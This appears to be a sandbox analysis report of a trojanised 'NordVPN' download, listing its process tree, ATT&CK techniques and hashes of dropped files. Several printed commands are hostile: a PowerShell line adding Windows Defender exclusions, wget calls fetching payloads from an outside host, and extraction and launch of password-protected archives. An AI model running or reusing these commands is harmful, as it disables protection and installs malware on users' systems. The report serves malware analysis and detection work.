"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.8.559184309\1915907281" -childID 7 -isForBrowser -prefsHandle 5848 -prefMapHandle 5844 -prefsLen 26285 -prefMapSize 233444 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5967c015-3b37-48fe-831f-3d6948a42493} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 5860 145139ab558 tab
3⤵
PID:5540

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.9.1771782841\217158023" -childID 8 -isForBrowser -prefsHandle 5056 -prefMapHandle 5108 -prefsLen 26725 -prefMapSize 233444 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {829adee5-4281-4ef9-a610-03061e01936e} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 5048 14512447b58 tab
3⤵
PID:1564

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.10.1618326309\413425509" -parentBuildID 20221007134813 -prefsHandle 4844 -prefMapHandle 4272 -prefsLen 26725 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a284c35b-bbc6-45d5-89c3-7d15b45bcfbb} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 2796 1450e05da58 rdd
3⤵
PID:5960

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.11.318254061\19738600" -parentBuildID 20221007134813 -sandboxingKind 1 -prefsHandle 3236 -prefMapHandle 3164 -prefsLen 26725 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4fbb6aa6-4d30-414c-b886-0b96befe9b38} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 2864 1450f2f7558 utility
3⤵
PID:3916

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3192

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\NordVPN-10_11\" -spe -an -ai#7zMap27144:88:7zEvent917
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:6052

C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe
"C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
PID:4848

C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
"C:\Users\Admin\AppData\Roaming\services\Launhcer.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
PID:5740

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2392

C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
"C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe"
4⤵
- Checks computer location settings
- Executes dropped EXE
PID:2612

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4808

C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/1/1 -P C:\Users\Admin\AppData\Roaming\services
5⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
PID:1800

C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\01plugins*.* "plugin*" C:\Users\Admin\AppData\Roaming\services
5⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
PID:5284

C:\Users\Admin\AppData\Roaming\services\plugin16904
C:\Users\Admin\AppData\Roaming\services\plugin16904
5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3700 -s 628
6⤵
- Program crash
PID:380

C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/2/1 -P C:\Users\Admin\AppData\Roaming\services
5⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
PID:5192

C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\02plugins*.* "2plugin*" C:\Users\Admin\AppData\Roaming\services
5⤵
- Executes dropped EXE
PID:1248

C:\Users\Admin\AppData\Roaming\services\2plugin20718
C:\Users\Admin\AppData\Roaming\services\2plugin20718
5⤵
PID:1160

C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/3/1 -P C:\Users\Admin\AppData\Roaming\services
5⤵
PID:1672

C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\03plugins*.* "3plugin*" C:\Users\Admin\AppData\Roaming\services
5⤵
PID:6100

C:\Users\Admin\AppData\Roaming\services\3plugin16826
C:\Users\Admin\AppData\Roaming\services\3plugin16826
5⤵
PID:5940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 856
6⤵
- Program crash
PID:5756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 904
6⤵
- Program crash
PID:4228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 960
6⤵
- Program crash
PID:4668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 1040
6⤵
- Program crash
PID:6124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 1020
6⤵
- Program crash
PID:4876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 1020
6⤵
- Program crash
PID:2468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 1140
6⤵
- Program crash
PID:4924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 1176
6⤵
- Program crash
PID:5952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 1140
6⤵
- Program crash
PID:5296

C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe
"C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe"
1⤵
- Executes dropped EXE
PID:6136

C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe
"C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe"
1⤵
- Executes dropped EXE
PID:5040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3700 -ip 3700
1⤵
PID:232

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap6622:88:7zEvent8870
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5940 -ip 5940
1⤵
PID:3640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5940 -ip 5940
1⤵
PID:1780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5940 -ip 5940
1⤵
PID:2484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5940 -ip 5940
1⤵
PID:2368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 5940 -ip 5940
1⤵
PID:6108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5940 -ip 5940
1⤵
PID:4320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5940 -ip 5940
1⤵
PID:5128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5940 -ip 5940
1⤵
PID:5812

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\NordVPN-10_11\" -spe -an -ai#7zMap8338:88:7zEvent13711
1⤵
PID:1936

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\gaix9yhh.default-release\thumbnails\49c6eaf24c972ce4720459699ad41679.png
Filesize
49KB

MD5
76197863ae28765b85face61d51e8309

SHA1
57f2e2fb95137aa89326679cb733541253093be8

SHA256
28076a9d77b31f0047d40540d98f85dcb2481eaa516cff0291012254355a856f

SHA512
5a5da73028b2af59b15b820edddc603543615b8a266d4facc36ce475a455befa291f0989f2b283e2ecb8aa7ad199d1cfea65ae90536f403cc43dcad7a50a5679

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fpww0w0r.3rh.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\datareporting\glean\db\data.safe.bin
Filesize
2KB

MD5
f05f543617b8face46542d646c55b6d1

SHA1
31a0b7e87707eb1361ecb4bc6f0152a955c4b973

SHA256
ae11567b65bea21ccc814cfec8fcba1109207a4eff99d3fc84ff551c3749645d

SHA512
27aac929a3cd91baec3af5643b89e7903a75ef8044f91c29b471660b26d3e35fbafd2d7c4e3e8985a8a0262818943a23e4ce35bcd94cf1989d018d771ba3e1a0

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\datareporting\glean\pending_pings\ab8cdac4-8a8f-4c93-8d2f-7d03ffd575d4
Filesize
746B

MD5
fb403e3808249a0ef5d50d1108f9770b

SHA1
09c96d890347b6ab12dc250a2764baeef8e703f7

SHA256
f8673694373c1631e2612e2fc05ad0099fad9a49286f0c43a3344f1eb80a6c83

SHA512
d1ce8473cfa30edc0804ed30ae5b5eba24f8d13910f41cb7011ab3b502fee63253371921768b6561584292f4c91cd27d64bc95314f6a800f52e70afe6a34b307

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\datareporting\glean\pending_pings\efeb1311-ca69-4ea6-b522-9dc391810200
Filesize
9KB

MD5
23d75d5683d0d770da46ba9c7b518818

SHA1
54102604312975c92706242ec9ef060947becfd9

SHA256
2bf63a115c0e147279e6e32796bf6a24315a6305041c5ce888ac9a73301daef1

SHA512
5a37df93a89144250edeb039721f60c0fe383479ae112c0dda2a430aaeac9ea0aed0fe6b5a34ae6efa83d956ce000ba5b861a81546ff9d1aa4dacc8bf42006fa

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\prefs-1.js
Filesize
6KB

MD5
1008a57a9212174c182b3793c3fec936

SHA1
ef60d8b64148df6f11fb80f33f00352c4ec63489

SHA256
7b3810d2df381c9ecc386e495e4d2dacf98edcffec141fefdf14ef9e1a330b64

SHA512
a2562c4d8b6e75193c109a128fa4c58f09bda8a93feacdcc782571067c5bf09164fb76b76ca76ee48ff79b5dd9fa43b4b97236bf8c78002d23358d1efb76c80a

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\prefs.js
Filesize
6KB

MD5
e29ab0d2aa826448bfb09679b6872a4a

SHA1
22216ffd94871730bdd0239136d175d8c9a726d2

SHA256
9248cf38e788be8a0f998ae84441f199fc5785127872bde784a4458df2f0d4e4

SHA512
8147a2582ca0a8da71f096fbdb040607fd3f2c56e8c7c7686f58862d44425124ca2715b0984509aaf8802a569d8320d6cb72bf6d7a03f0ecd03cf2db5b6cfb33

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\sessionstore-backups\recovery.jsonlz4
Filesize
4KB

MD5
69a8226367e9975efcaaf037c6dc1d07

SHA1
ca3d47439ecd6781f23423e3b3973be06a9e07d1

SHA256
1d733f1d4f2c4919f0064552d6f0e2edefa41bd1b4c6ee1d3b22e52f9517196d

SHA512
b08af08ec931c62254dbb70d751ddc4e74d7f250a68c5eadce8e7cd2317076c49a6e7cf7e62c3dbdff9980a2068cd0cc0c36eb4a93cf01a27776f940ba563956

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\sessionstore-backups\recovery.jsonlz4
Filesize
14KB

MD5
965adcaec10c82840e217cf82bd83422

SHA1
ca82b0dcc8023ff30c84a0962480f3e22d573ae2

SHA256
3d389c8ef6f58d1b44f17f491b49b398ac24710d55b7e2773ac8f5b31544fa70

SHA512
f316414c15d38b0af00d4aebc5e5e9dff3f837baeb8b98cc0e5417e4031db43d93bbb505cdc36d04b8a804dd15dea61383d9789ad9f22cddd4041450a2225d34

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\sessionstore-backups\recovery.jsonlz4
Filesize
3KB

MD5
6909468c9f43c288423627fdd7cd5470

SHA1
393d01e5cd85d4a622e2cda5c01aaceaa1edacf1

SHA256
f6c27baddbd79ef5c502740a766b79ab1a268807ca75f2f39f9fb2620d8efbe6

SHA512
8aa7ba379e24c801c25b09152c70c42c877cb0c0fa6d7502fc34d8203729af37bfef488f3bbf407a24710eabd06b8811fae0381b1dc5a0cbde675b77a7605926

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\sessionstore-backups\recovery.jsonlz4
Filesize
4KB

MD5
1639e98f6397aed6f1f6cf6a89c20748

SHA1
1879bb1a689b482a9b8d1e0fc0c19d5f9416d702

SHA256
584456e5d5de4ee42642463c4487b10309545ce2c75f14990c5437b1b2aabdd1

SHA512
9d9c7d96b05d006312a07ffce188ccab74c540904d25f10044ce23078ec0f75184ce18dc0d4876f54c95c27428881fdbf79956dfc1205ab1776fb14209731f0b

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\sessionstore-backups\recovery.jsonlz4
Filesize
14KB

MD5
0cfbf43267c6264d825234e78b0d683f

SHA1
98e071c20b2e065b256b1f85ce0d8983ba8df464

SHA256
eac65b2c7459ce8a38458e9767a1b44f2056e314c08ad1220896c09d2f8afc32

SHA512
f89fc31fa161e7d24c54b352a44e740a6284e235516f42d96bad6707c7ee0062699eed30045ef06f90dc2bdb6d0d18a0d9da4cc69385a35aea062fcfbda80664

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\sessionstore-backups\recovery.jsonlz4
Filesize
14KB

MD5
446fca81f3127bb659ef84813c02a5e0

SHA1
0a1818f315efc19a9e8e1ba1420ef434f4fbfe15

SHA256
cf3a1aad00a2216474d0ce7e5e63a43cc1c2d41e2d15263a0bfafa2ae9f701bc

SHA512
611de8be487e8592205eea520ea19923acf2ba18e59ba37985e4a1ee6592aa0bf9fd14daabf8cac1f44bd3b29494f3513ad2c85c7bfdd43bea0a7d79a19f70f1

Download Submit
C:\Users\Admin\AppData\Roaming\WinRAR\version.dat
Filesize
12B

MD5
5e4bed1f03eaf955f34fb7aac08e1ea9

SHA1
25995351caff180c6054845dbb065ad15c35f502

SHA256
d24273e54ee82454ed6a49fad5c3e6ff593121ed45ebb6a88b7b36de994e67af

SHA512
e06a0b7be4941d9790455b71350fba0dc5cda3c18c61bd3d365da986a92585e42d57a0d723b6aef19c1c173208cd310b74096b77aaea8aa1590e4a33e848b9bb

Download Submit
C:\Users\Admin\AppData\Roaming\services\.wget-hsts
Filesize
184B

MD5
249e2716b9617321571ec649761b6c55

SHA1
9aa9ce93d585744b92c3a66f70b84cd0965ac2cb

SHA256
d0ba8b6245274e17cd9fabb2d9eb654d9a9db39a7c494c8eb3339e03fde9b988

SHA512
ea2d7f3fd57d14039a1c1ebb824a870efd8e765e13f126ee742e0a73a3bde832ab6f6e36a41d77f381a33a86af4e16c14e4be12abf259592bdc8e2bfa3731b10

Download Submit
C:\Users\Admin\AppData\Roaming\services\.wget-hsts
Filesize
184B

MD5
221a8c261f9722171aee46f3cbc4c268

SHA1
02c211e3f4d547fddb1e3a375892198e485ee41d

SHA256
bf3b7fbb8af24192c830d43bf157f40c12dbe86bce239742fce9af712f6c0630

SHA512
667231be15354f00b7cee4c8f3047dab69f37e4e5ead2b7acfc3d72246f4131433cf6af5c89952933adc06699ea4d9a4b59ea8b22dfaa0a8d4afc123dfdab385

Download Submit
C:\Users\Admin\AppData\Roaming\services\01plugins16318.rar
Filesize
2.9MB

MD5
e5e2d68307b34f409a92ef7669837322

SHA1
ee6cf43a96cac8e36f8b8dd06c826d428063f1d5

SHA256
d4032168bf6b6de3d4f936c03d947fe6524ced7cca91bbc2134bbf8fbc834cce

SHA512
b9ed94940194dcdddab7230db7d6ccf527e5bff4c9f822a553430f19d0f172a5d4fe1052a69ca19afd394f52ee9953a0f61afaf3447bd927b3b94114e505b2c5

Download Submit
C:\Users\Admin\AppData\Roaming\services\02plugins22289.rar
Filesize
10.0MB

MD5
72aa5a9a19666e3a55e01e1d601c427e

SHA1
568a2a9d127b3c36723c5a906c0558862a64f2ae

SHA256
8ff970c1c22841e952b43f4d3cb8c1eb5e950d8d07a6f3d63d9ed02decd81492

SHA512
e5d23c418286b065f3e17af6b32eaa7140d22f7c78e9e564702a4c9bb34d7fd8480409217133c682aa0b30d59bdb4743feb0774330e5d9219276fa52af206f3e

Download Submit
C:\Users\Admin\AppData\Roaming\services\03plugins20500.rar
Filesize
2.9MB

MD5
e0ee8a8e48b04842a4434c1b61b7a0eb

SHA1
4d818c5553ac1a143ed779a231e097031e9861ab

SHA256
b4035a9802d9780599901c0a857ecbf9c01c0b6649ba50149c54bc020cd543be

SHA512
edf098b9eecb42d4b3747fbd84b564ae30af4d8bb6724e0ec6309d69f15173fb8008d8db05050344aadba71038ea005fed99f7658d4a337b176ffa28ca124dad

Download Submit
C:\Users\Admin\AppData\Roaming\services\2plugin20718
Filesize
7.6MB

MD5
098f0b6b6cfa12d01ee4c84aeb790a0e

SHA1
15c4be833af1c5ec6eae1cc9e860de30fb625895

SHA256
21c8a15270b17d16ed2bfb0b0522a59515c1991ccb4489cc374edb884dddc6b5

SHA512
882633c26faf013036bcaa756d2c8ff45b5826d5c9e2cf7e679ca4df25ac00b1b563e88375f05ae1f86b41becd5af9385ce345bbb12f4d3d1dc2e21e66a3a8c6

Download Submit
C:\Users\Admin\AppData\Roaming\services\3plugin16826
Filesize
380KB

MD5
e6b9e5284ebbee453b064a4a69dc4ac8

SHA1
e7f7c669e671518cf64e8abe0ee461c016752446

SHA256
ecd35974505db0e7b6f99a14f088856acfe1ed674305d738383957e13b1b4614

SHA512
bc0b7e6bdafde1bd071705a4dc7b3af51a4c1e4c75865a76ea4ee1e319d1b116c7977f0ea1833581cc78688873c2253d5a613e2e9a10a51406c86bde4d3f535b

Download Submit
C:\Users\Admin\AppData\Roaming\services\data\Launcher.dll
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\AppData\Roaming\services\plugin16904
Filesize
410KB

MD5
c233a13f928f3d16c08b4ce9231dd11e

SHA1
01f011955763cd6b25d8c2b463c42d2339807737

SHA256
bceda9a1bbaa1b5e4353c64f7a95fc00e757872cbfc67f2ee1aa2f501c7a0ae0

SHA512
6e6192e46b3089e7fa3d320a5457a023cf210f4a2fb41378f9a9c84aacd7c1f5f7efdbfc6b322a7f2e7916b9a18961cd320fd49f24a9ac1448ae56cd426e5ba5

Download Submit
C:\Users\Admin\Downloads\NordVPN-10_11.g2vukrUZ.zip.part
Filesize
217.6MB

MD5
dc4f1a240f8a940977284ce77f876439

SHA1
6b013a62e9d0d511256f69abc4ded33c7f291772

SHA256
3f80c20fecafcfa264532eae938edb81dd04c8d0335c366f0b3c4c64ad529967

SHA512
f92f00734f19c669c26febe8e227d7a2f3f23b901e21c9a9ec19ad9e4aac9863c9ef32f03b8d646ec4a4e1d67769d833012698c0d720a049f0c9af342d3f29c1

Download Submit
C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.dll
Filesize
2KB

MD5
32e7556ff4f5256d15e1fc843cee5e3d

SHA1
b7283061428e9ca741c26dcfc3e869e2fc699f0b

SHA256
b2f5dfcba2018e9b4314c245f6391783bd3717fe02fec3e6edf1b9d1a3801278

SHA512
d39ca3fd8edb7db7e19655ea3aa69d8b0a4008514ed356808b59f7cdf4c109b7efd0ed54f6ea099d37b33f107f234adc4f01a178c90961e88d3c9ed7a8ebe40e

Download Submit
C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe
Filesize
364KB

MD5
93fde4e38a84c83af842f73b176ab8dc

SHA1
e8c55cc160a0a94e404f544b22e38511b9d71da8

SHA256
fb07af2aead3bdf360f555fc872191e43c2f0acbfc9258435f9a30afe272ba03

SHA512
48720aebe2158b8a58fc3431c2e6f68271fbade51303ad9cb5b0493efaec6053ff0c19a898841ef7c57a3c4d042ac8e7157fb3dc79593c1dfcdcf88e1469fdec

Download Submit
C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe.manifest
Filesize
1KB

MD5
1b6de83d3f1ccabf195a98a2972c366a

SHA1
09f03658306c4078b75fa648d763df9cddd62f23

SHA256
e20486518d09caf6778ed0d60aab51bb3c8b1a498fd4ede3c238ee1823676724

SHA512
e171a7f2431cfe0d3dfbd73e6ea0fc9bd3e5efefc1fbdeff517f74b9d78679913c4a60c57dde75e4a605c288bc2b87b9bb54b0532e67758dfb4a2ac8aea440ce

Download Submit
C:\Users\Admin\Downloads\NordVPN-10_11\data\0a7TilYbj59R
Filesize
150KB

MD5
8fd9587175089a28f343787c5584ba78

SHA1
4ed5968257f4da2e8745456809a775f86e03378b

SHA256
7c419ed0d315faf4e9e3c8a0060bfae24030e619dc1de2ca224e8e3f98c176c8

SHA512
e9e0b00d07eda323fc76eac1dff83cfebfaa9f7760f0b83fe82a9e7c513a54b631d2b98e2cee0ca81015136812e8e4472d1f89964eda8f9fb5e723b51e1a5383

Download Submit
C:\Users\Admin\Downloads\NordVPN-10_11\data\AppInfo\services\Launhcer.dll
Filesize
2KB

MD5
7de0541eb96ba31067b4c58d9399693b

SHA1
a105216391bd53fa0c8f6aa23953030d0c0f9244

SHA256
934f75c8443d6379abdc380477a87ef6531d0429de8d8f31cd6b62f55a978f6e

SHA512
e5ffa3bfd19b4d69c8b4db0aabaf835810b8b8cccd7bc400c7ba90ef5f5ebd745c2619c9a3e83aa6b628d9cf765510c471a2ff8cb6aa5ad4cf3f7826f6ae84a3

Download Submit
C:\Users\Admin\Downloads\NordVPN-10_11\data\AppInfo\services\Launhcer.exe
Filesize
364KB

MD5
e5c00b0bc45281666afd14eef04252b2

SHA1
3b6eecf8250e88169976a5f866d15c60ee66b758

SHA256
542e2ebbded3ef0c43551fb56ce44d4dbb36a507c2a801c0815c79d9f5e0f903

SHA512
2bacd4e1c584565dfd5e06e492b0122860bfc3b0cc1543e6baded490535309834e0d5bb760f65dbfb19a9bb0beddb27a216c605bbed828810a480c8cd1fba387

Download Submit
C:\Users\Admin\Downloads\NordVPN-10_11\data\AppInfo\services\Launhcer.exe.manifest
Filesize
1KB

MD5
f0fc065f7fd974b42093594a58a4baef

SHA1
dbf28dd15d4aa338014c9e508a880e893c548d00

SHA256
d6e1c130f3c31258b4f6ff2e5d67bb838b65281af397a11d7eb35a7313993693

SHA512
8bd26de4f9b8e7b6fe9c42f44b548121d033f27272f1da4c340f81aa5642adc17bb9b092ece12bb8515460b9c432bf3b3b7b70f87d4beb6c491d3d0dfb5b71fe

Download Submit
C:\Users\Admin\Downloads\NordVPN-10_11\data\AppInfo\services\WinRAR.exe
Filesize
2.1MB

MD5
f59f4f7bea12dd7c8d44f0a717c21c8e

SHA1
17629ccb3bd555b72a4432876145707613100b3e

SHA256
f150b01c1cbc540c880dc00d812bcca1a8abe1166233227d621408f3e75b57d4

SHA512
44811f9a5f2917ccd56a7f894157fa305b749ca04903eeaeca493864742e459e0ce640c01c804c266283ce8c3e147c8e6b6cfd6c5cb717e2a374e92c32a63b2c

Download Submit
C:\Users\Admin\Downloads\NordVPN-10_11\data\AppInfo\services\data\Launcher.dll
Filesize
6KB

MD5
f58866e5a48d89c883f3932c279004db

SHA1
e72182e9ee4738577b01359f5acbfbbe8daa2b7f

SHA256
d6f3e13dfff0a116190504efbfcbcd68f5d2183e6f89fd4c860360fba0ec8c12

SHA512
7e76555e62281d355c2346177f60bfe2dc433145037a34cfc2f5848509401768b4db3a9fd2f6e1a1d69c5341db6a0b956abf4d975f28ee4262f1443b192fe177

Download Submit
C:\Users\Admin\Downloads\NordVPN-10_11\data\AppInfo\services\wget.exe
Filesize
4.9MB

MD5
8c04808e4ba12cb793cf661fbbf6c2a0

SHA1
bdfdb50c5f251628c332042f85e8dd8cf5f650e3

SHA256
a7b656fb7a45f8980784b90b40f4a14d035b9dc15616465a341043736ec53272

SHA512
9619f96c3180ef3d738ecc1f5df7508c3ff8904021065665c8388a484648e135105e1c1585de1577c8b158f9b5bc241e3ff7f92665e9553e846e1b750ddea20f

Download Submit
C:\Users\Admin\Downloads\NordVPN-10_11\data\appInfo\KzudmJin6lXi
Filesize
110KB

MD5
c92fed2e8824ebe59b2b38310ea3fe8d

SHA1
9d146f2ab0e98890a378a65c552a36590fcad271

SHA256
1702cc8523a4361f705cf02ea1bb747eec81d74a649dfac30385504ba941447b

SHA512
12364fd7996b2a8542812b546d13c861b653e7608dafc8ef9c729603d951d98fd14a3cc242a523b7e51927deca7a883f0e671fb8a7871f45306066ac2454ef85

Download Submit
C:\Users\Admin\Downloads\NordVPN-10_11\data\appInfo\M2oXKqJw7kuL
Filesize
110KB

MD5
a526b31d99b1d923ffa55ae90bfce68b

SHA1
7701b458645c22ee2070aa8ed91e145c355d720c

SHA256
5b055c8fd3c52659e9f0de6edc6a03e03b1f26860542320aba89fa9c6e96db55

SHA512
331bd378fb0b5e638a9743c5232d6976b62ce680cb5d7a195db6523931ad1d63271652acab090af89b47768d68feb32d00b1c9b6d8823a0ec7fbac570a706c2c

Download Submit
C:\Users\Admin\Downloads\NordVPN-10_11\data\appInfo\P1pLxqSzXgRg
Filesize
110KB

MD5
1355fc586770db90ea21cbe6b89fe845

SHA1
a9883ef24e93541ca9d45a970473ec5780533b71

SHA256
19814dcc1fca8141bacdb44feee963a9f5ecec810df659edf1fff8a17913e2d4

SHA512
489e58d00d5202027ae88a804e7353a3474e128c1b5b59e5a0c74beb33752973f854fcbcfa1bb089f202fb98513bf5f4c260ed4fd8dd9f53a8a056c093e0a6e9

Download Submit
C:\Users\Admin\Downloads\NordVPN-10_11\data\appInfo\PAD0IZ9SNxru
Filesize
110KB

MD5
1ad79d8978eb39916bfcf12201a8a8d4

SHA1
47b067f53e1073dde9d1f0fed81f318e02cc8e39

SHA256
4cebcd0162c2f388827417c21e47f5e3d927f23d2c576d0e19caf0afb12adc5c

SHA512
